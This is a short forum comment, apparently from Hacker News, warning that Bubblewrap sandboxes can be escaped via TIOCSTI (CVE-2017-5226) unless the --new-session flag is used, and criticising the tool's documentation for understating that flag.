|
|
|
|
|
|
by rsa25519
1545 days ago
|
|
|
Note that a sandbox escape is often possible via TIOCSTI (CVE-2017-5226) [0] unless a special flag (--new-session) is used. Bubblewrap is aware of this, yet their documentation gives no indication that this flag is necessary to produce a secure sandbox. In --help, the documentation of --new-session is simply "Create a new terminal session," which severely understates its importance. It's frustrating to have such a useful tool be knowingly easy to misuse. [0]: https://github.com/containers/bubblewrap/issues/142 |
|
|